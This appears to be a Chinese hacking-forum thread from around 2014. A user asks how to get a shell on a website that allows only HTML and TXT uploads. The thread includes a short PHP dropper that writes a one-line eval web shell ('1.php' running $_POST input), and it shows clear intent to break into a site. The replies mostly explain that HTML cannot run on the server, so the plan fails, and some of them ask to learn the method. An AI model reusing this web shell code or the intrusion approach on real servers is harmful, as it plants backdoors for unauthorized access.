网站能上传HTML和txt,怎么拿shell
本来想着用html加iframe浮动框架,包含一个远程的php的文件进来,然后php文件执行下面的代码在刚上传的1.html同目录下生成一个一句话文件。。。可惜思路错误,执行php文件的代码后,并不能在1.html同目录下生成一个一句话文件。分析才发现想法太2,这样执行只能在原来那个php的文件夹下生成一句话文件。。。
<?php
$filename = '1.php';
if (file_exists($filename)) {
} else {
$ft=fopen("1.php",w);
fwrite($ft,'<?php eval ($_POST);?>');
fclose($ft);
echo "write in";
}
?>
希望各位大大给出比较合适的方法 快来解答吧各位{:soso_e183:} {:soso_e127:}哥这样能拿到shell我就服了你了 能通过html拿shell的方法我至今未见过 因为html不是在服务端运行的 Free_小东 发表于 2014-7-9 13:22
哥这样能拿到shell我就服了你了 能通过html拿shell的方法我至今未见过 因为html不是在服务 ...
哥,难道说这个 歪脖树 咱拿不下来了? 我也想知道 你用html包含一个php,能在你拿shell的网站目录下生成出文件,就真见鬼了。 拿到了说下,让我学习学习 你看得懂这段php代码吗,哥{:soso_e153:}, html不能在服务器端执行的,所以包含进去也执行不了